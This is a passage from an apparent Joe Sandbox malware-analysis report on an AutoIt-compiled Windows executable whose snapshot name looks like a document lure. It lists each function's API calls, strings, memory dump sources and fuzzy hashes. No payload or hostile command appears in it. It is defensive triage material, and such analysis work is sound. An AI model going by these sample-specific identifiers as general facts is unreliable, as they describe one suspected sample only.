                                                        • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00848C8D
                                                        • _memset.LIBCMT ref: 00848CEC
                                                        • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00848D16
                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 00848D6E
                                                        • SendMessageW.USER32(?,0000133D,?,?), ref: 00848E1B
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00848E3D
                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00848E87
                                                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00848EB4
                                                        • DrawMenuBar.USER32(?), ref: 00848EC3
                                                        • SetWindowTextW.USER32(?,0000014E), ref: 00848EEB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                        • String ID: 0$0R
                                                        • API String ID: 1073566785-488941688
                                                        • Opcode ID: b4889fcebc7997f4cfa3d8978e4cb0f84b57aaf9a35d53d0c38a8fe563aa53b0
                                                        • Instruction ID: 613702860b2339dc697c2e54f335b1b7fad34c4c8d75706c8210188021b160fe
                                                        • Opcode Fuzzy Hash: b4889fcebc7997f4cfa3d8978e4cb0f84b57aaf9a35d53d0c38a8fe563aa53b0
                                                        • Instruction Fuzzy Hash: E2E18E7490121CEEDB20DF54CC84AEE7BB9FF0A710F00815AFA15EA291EB749984CF61
                                                        Function 0084A8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSysColor.USER32(00000012), ref: 0084A903
                                                        • SetTextColor.GDI32(?,?), ref: 0084A907
                                                        • GetSysColorBrush.USER32(0000000F), ref: 0084A91D
                                                        • GetSysColor.USER32(0000000F), ref: 0084A928
                                                        • CreateSolidBrush.GDI32(?), ref: 0084A92D
                                                        • GetSysColor.USER32(00000011), ref: 0084A945
                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0084A953
                                                        • SelectObject.GDI32(?,00000000), ref: 0084A964
                                                        • SetBkColor.GDI32(?,00000000), ref: 0084A96D
                                                        • SelectObject.GDI32(?,?), ref: 0084A97A
                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 0084A999
                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0084A9B0
                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 0084A9C5
                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0084A9ED
                                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0084AA14
                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 0084AA32
                                                        • DrawFocusRect.USER32(?,?), ref: 0084AA3D
                                                        • GetSysColor.USER32(00000011), ref: 0084AA4B
                                                        • SetTextColor.GDI32(?,00000000), ref: 0084AA53
                                                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0084AA67
                                                        • SelectObject.GDI32(?,0084A5FA), ref: 0084AA7E
                                                        • DeleteObject.GDI32(?), ref: 0084AA89
                                                        • SelectObject.GDI32(?,?), ref: 0084AA8F
                                                        • DeleteObject.GDI32(?), ref: 0084AA94
                                                        • SetTextColor.GDI32(?,?), ref: 0084AA9A
                                                        • SetBkColor.GDI32(?,?), ref: 0084AAA4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                        • String ID:
                                                        • API String ID: 1996641542-0
                                                        • Opcode ID: 78bdc229445ce48c611efddb1dcc9f2f6d30cf1bff50b1bb6b137066c46d44c4
                                                        • Instruction ID: 771e1fe3c2ad2adbd08b1c57e344b7f197f97f671a9e637e8a31043766b907fb
                                                        • Opcode Fuzzy Hash: 78bdc229445ce48c611efddb1dcc9f2f6d30cf1bff50b1bb6b137066c46d44c4
                                                        • Instruction Fuzzy Hash: 42512D75900208FFDB119FA4DC48EAEBF79FB49320F114529FA11AB2A2D7759940DF90
                                                        Function 0084488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCursorPos.USER32(?), ref: 008449CA
                                                        • GetDesktopWindow.USER32 ref: 008449DF
                                                        • GetWindowRect.USER32(00000000), ref: 008449E6
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00844A48
                                                        • DestroyWindow.USER32(?), ref: 00844A74
                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00844A9D
                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00844ABB
                                                        • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00844AE1
                                                        • SendMessageW.USER32(?,00000421,?,?), ref: 00844AF6
                                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00844B09
                                                        • IsWindowVisible.USER32(?), ref: 00844B29
                                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00844B44
                                                        • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00844B58
                                                        • GetWindowRect.USER32(?,?), ref: 00844B70
                                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 00844B96
                                                        • GetMonitorInfoW.USER32(00000000,?), ref: 00844BB0
                                                        • CopyRect.USER32(?,?), ref: 00844BC7
                                                        • SendMessageW.USER32(?,00000412,00000000), ref: 00844C32
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                        • String ID: ($0$tooltips_class32
                                                        • API String ID: 698492251-4156429822
                                                        • Opcode ID: 19d15c2b662e005510545593aaa82f9b866b7b7a44432bdab27ababc58b431f1
                                                        • Instruction ID: eecf66204a4e6aae035731614f984f08ca6b1346e6b3b0256403b0596bf9e490
                                                        • Opcode Fuzzy Hash: 19d15c2b662e005510545593aaa82f9b866b7b7a44432bdab27ababc58b431f1
                                                        • Instruction Fuzzy Hash: E6B18A70604354AFDB44DF64C888B6ABBE4FF89314F00891CF9999B2A1DB75EC05CB96
                                                        Function 007C27D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007C28BC
                                                        • GetSystemMetrics.USER32(00000007), ref: 007C28C4
                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007C28EF
                                                        • GetSystemMetrics.USER32(00000008), ref: 007C28F7
                                                        • GetSystemMetrics.USER32(00000004), ref: 007C291C
                                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 007C2939
                                                        • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 007C2949
                                                        • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 007C297C
                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 007C2990
                                                        • GetClientRect.USER32(00000000,000000FF), ref: 007C29AE
                                                        • GetStockObject.GDI32(00000011), ref: 007C29CA
                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 007C29D5
                                                          • Part of subcall function 007C2344: GetCursorPos.USER32(?), ref: 007C2357
                                                          • Part of subcall function 007C2344: ScreenToClient.USER32(008857B0,?), ref: 007C2374
                                                          • Part of subcall function 007C2344: GetAsyncKeyState.USER32(00000001), ref: 007C2399
                                                          • Part of subcall function 007C2344: GetAsyncKeyState.USER32(00000002), ref: 007C23A7
                                                        • SetTimer.USER32(00000000,00000000,00000028,007C1256), ref: 007C29FC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                        • String ID: AutoIt v3 GUI
                                                        • API String ID: 1458621304-248962490
                                                        • Opcode ID: ad220495672beb87de40cf0b366c64c41848cc5f8aa002ac14f683e3bddb63f5
                                                        • Instruction ID: 40dc8175a74acffb767d995c2bb79e21f1ace05ec8b5c38a15d6ab04573af095
                                                        • Opcode Fuzzy Hash: ad220495672beb87de40cf0b366c64c41848cc5f8aa002ac14f683e3bddb63f5
                                                        • Instruction Fuzzy Hash: 48B15A75A0020AEFDB15DFA8DD45FAE7BA4FB08310F10812DFA15E62A1DB78A851CB50
                                                        Function 007FA8CB Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 211COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                                        • String ID: {n~${n~
                                                        • API String ID: 884005220-1009307361
                                                        • Opcode ID: 3532a7e66f5043cb22c61eb3939db32537cd657ae5a05d4c39f0c73db7a745da
                                                        • Instruction ID: f912b0a51f63122e2c137e2e9edeb6c3f6c8c5451c5c4fd92b562aef98acb967
                                                        • Opcode Fuzzy Hash: 3532a7e66f5043cb22c61eb3939db32537cd657ae5a05d4c39f0c73db7a745da
                                                        • Instruction Fuzzy Hash: 3861F5F2501209FFDB109F64DC4977977A8AF04B20F214125EA09A7391EBBCA945CB63
                                                        Function 0081A439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetClassNameW.USER32(?,?,00000100), ref: 0081A47A
                                                        • __swprintf.LIBCMT ref: 0081A51B
                                                        • _wcscmp.LIBCMT ref: 0081A52E
                                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0081A583
                                                        • _wcscmp.LIBCMT ref: 0081A5BF
                                                        • GetClassNameW.USER32(?,?,00000400), ref: 0081A5F6
                                                        • GetDlgCtrlID.USER32(?), ref: 0081A648
                                                        • GetWindowRect.USER32(?,?), ref: 0081A67E
                                                        • GetParent.USER32(?), ref: 0081A69C
                                                        • ScreenToClient.USER32(00000000), ref: 0081A6A3
                                                        • GetClassNameW.USER32(?,?,00000100), ref: 0081A71D
                                                        • _wcscmp.LIBCMT ref: 0081A731
                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 0081A757
                                                        • _wcscmp.LIBCMT ref: 0081A76B
                                                          • Part of subcall function 007E362C: _iswctype.LIBCMT ref: 007E3634
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                        • String ID: %s%u
                                                        • API String ID: 3744389584-679674701
                                                        • Opcode ID: bb213c47cd5d7418c5cfb69151dee3819f1dd04830ceedff0337fe9b719e882f
                                                        • Instruction ID: 40e8110231cc7f71ff12d593d98cdcec8820364090b1db2414481141bb5a2bb8
                                                        • Opcode Fuzzy Hash: bb213c47cd5d7418c5cfb69151dee3819f1dd04830ceedff0337fe9b719e882f
                                                        • Instruction Fuzzy Hash: 9EA1E171205206AFD718DF60C888FEAB7ECFF54314F048929F999D2190DB34EA95CB92
                                                        Function 0081AED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetClassNameW.USER32(00000008,?,00000400), ref: 0081AF18
                                                        • _wcscmp.LIBCMT ref: 0081AF29
                                                        • GetWindowTextW.USER32(00000001,?,00000400), ref: 0081AF51
                                                        • CharUpperBuffW.USER32(?,00000000), ref: 0081AF6E
                                                        • _wcscmp.LIBCMT ref: 0081AF8C
                                                        • _wcsstr.LIBCMT ref: 0081AF9D
                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 0081AFD5
                                                        • _wcscmp.LIBCMT ref: 0081AFE5
                                                        • GetWindowTextW.USER32(00000002,?,00000400), ref: 0081B00C
                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 0081B055
                                                        • _wcscmp.LIBCMT ref: 0081B065
                                                        • GetClassNameW.USER32(00000010,?,00000400), ref: 0081B08D
                                                        • GetWindowRect.USER32(00000004,?), ref: 0081B0F6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                        • String ID: @$ThumbnailClass
                                                        • API String ID: 1788623398-1539354611
                                                        • Opcode ID: 6252685c5d1c500eaa4566458300e9de0efdf3e0831cd582f338033b90f8594e
                                                        • Instruction ID: e7911005a966ec7164caf748afd1aaa6f2a8202895a1995bbd19967da88a5a38
                                                        • Opcode Fuzzy Hash: 6252685c5d1c500eaa4566458300e9de0efdf3e0831cd582f338033b90f8594e
                                                        • Instruction Fuzzy Hash: ED819E71108245ABDB04DF25C885FAA7BECFF44314F14846AFD89CA096DB34DD8ACB62
                                                        Function 0084A1B9 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 205windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 0084A259
                                                        • DestroyWindow.USER32(?,?), ref: 0084A2D3
                                                          • Part of subcall function 007C7BCC: _memmove.LIBCMT ref: 007C7C06
                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0084A34D
                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0084A36F
                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0084A382
                                                        • DestroyWindow.USER32(00000000), ref: 0084A3A4
                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,007C0000,00000000), ref: 0084A3DB
                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0084A3F4
                                                        • GetDesktopWindow.USER32 ref: 0084A40D
                                                        • GetWindowRect.USER32(00000000), ref: 0084A414
                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0084A42C
                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0084A444
                                                          • Part of subcall function 007C25DB: GetWindowLongW.USER32(?,000000EB), ref: 007C25EC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                        • String ID: 0$0R$tooltips_class32
                                                        • API String ID: 1297703922-1664022856
                                                        • Opcode ID: a12b85fb95f09b58dfded6e514d537e3f02a2e833e783cabb156bdd9def3d240
                                                        • Instruction ID: bc334c0be69249b508f63a0f7d8fce4093625a15c6692a9c9d8e6824f60bc999
                                                        • Opcode Fuzzy Hash: a12b85fb95f09b58dfded6e514d537e3f02a2e833e783cabb156bdd9def3d240
                                                        • Instruction Fuzzy Hash: CC71AC74180208AFD729CF28CC49F6A7BE9FB99704F04452DF985DB2A1D7B4E902CB56
                                                        Function 0084C5FE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007C2612: GetWindowLongW.USER32(?,000000EB), ref: 007C2623
                                                        • DragQueryPoint.SHELL32(?,?), ref: 0084C627
                                                          • Part of subcall function 0084AB37: ClientToScreen.USER32(?,?), ref: 0084AB60
                                                          • Part of subcall function 0084AB37: GetWindowRect.USER32(?,?), ref: 0084ABD6
                                                          • Part of subcall function 0084AB37: PtInRect.USER32(?,?,0084C014), ref: 0084ABE6
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0084C690
                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0084C69B
                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0084C6BE
                                                        • _wcscat.LIBCMT ref: 0084C6EE
                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0084C705
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0084C71E
                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0084C735
                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0084C757
                                                        • DragFinish.SHELL32(?), ref: 0084C75E
                                                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0084C851
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                        • String ID: 0R$@GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                        • API String ID: 169749273-1450502738
                                                        • Opcode ID: bbdba39f3e0c575c471b397fd3b1c4d685f5868702cbf1be79fc2c953252cd6c
                                                        • Instruction ID: 70be22e7201988703bbc810c109da5d68144c6191bf28ef7db72ce4c943d99d5
                                                        • Opcode Fuzzy Hash: bbdba39f3e0c575c471b397fd3b1c4d685f5868702cbf1be79fc2c953252cd6c
                                                        • Instruction Fuzzy Hash: BE615E71108304AFC705EF64CC89EABBBE8FF99750F00492EF695961A1DB34A949CB52
                                                        Function 0081ABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: __wcsnicmp
                                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                        • API String ID: 1038674560-1810252412
                                                        • Opcode ID: 44c6a115bb3d24b2094cf66c2332452319698c8f78f926722725e09be80fca5d
                                                        • Instruction ID: aaa291c38a77c8797b99ec94cabe0710245c3dc66e5131d394e28a546642d3ab
                                                        • Opcode Fuzzy Hash: 44c6a115bb3d24b2094cf66c2332452319698c8f78f926722725e09be80fca5d
                                                        • Instruction Fuzzy Hash: 6131E630549219E6EA08EA64DD4BFEEB768FF14710F60402CF419F11D5EF29AF44CA92
                                                        Function 00834FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 00835013
                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 0083501E
                                                        • LoadCursorW.USER32(00000000,00007F03), ref: 00835029
                                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 00835034
                                                        • LoadCursorW.USER32(00000000,00007F01), ref: 0083503F
                                                        • LoadCursorW.USER32(00000000,00007F81), ref: 0083504A
                                                        • LoadCursorW.USER32(00000000,00007F88), ref: 00835055
                                                        • LoadCursorW.USER32(00000000,00007F80), ref: 00835060
                                                        • LoadCursorW.USER32(00000000,00007F86), ref: 0083506B
                                                        • LoadCursorW.USER32(00000000,00007F83), ref: 00835076
                                                        • LoadCursorW.USER32(00000000,00007F85), ref: 00835081
                                                        • LoadCursorW.USER32(00000000,00007F82), ref: 0083508C
                                                        • LoadCursorW.USER32(00000000,00007F84), ref: 00835097
                                                        • LoadCursorW.USER32(00000000,00007F04), ref: 008350A2
                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 008350AD
                                                        • LoadCursorW.USER32(00000000,00007F89), ref: 008350B8
                                                        • GetCursorInfo.USER32(?), ref: 008350C8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Cursor$Load$Info
                                                        • String ID:
                                                        • API String ID: 2577412497-0
                                                        • Opcode ID: e96a4850493c6c2b96a1b34934d0645cad6078f5494394a78c025070920b977e
                                                        • Instruction ID: e80fff8143b8b35fe75b87fb15922b61952facb99ee0dfaf7cb3b967bea478f7
                                                        • Opcode Fuzzy Hash: e96a4850493c6c2b96a1b34934d0645cad6078f5494394a78c025070920b977e
                                                        • Instruction Fuzzy Hash: 3B3112B1D0871DAADF109FB68C8996EBFE8FF04750F50453AA50CE7280DA79A500CF91
                                                        Function 00844392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?), ref: 00844424
                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0084446F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
